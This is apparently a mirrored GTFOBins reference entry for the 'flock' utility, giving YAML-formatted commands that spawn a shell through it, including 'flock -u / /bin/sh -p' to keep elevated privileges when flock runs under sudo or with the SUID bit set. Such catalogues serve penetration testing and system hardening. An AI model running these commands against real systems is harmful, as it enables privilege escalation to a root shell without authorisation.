mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-03-07 14:36:23 +01:00
14 lines
194 B
Plaintext
14 lines
194 B
Plaintext
---
|
|
functions:
|
|
shell:
|
|
- code: |-
|
|
flock -u / /bin/sh
|
|
contexts:
|
|
sudo:
|
|
suid:
|
|
code: |-
|
|
flock -u / /bin/sh -p
|
|
shell: false
|
|
unprivileged:
|
|
...
|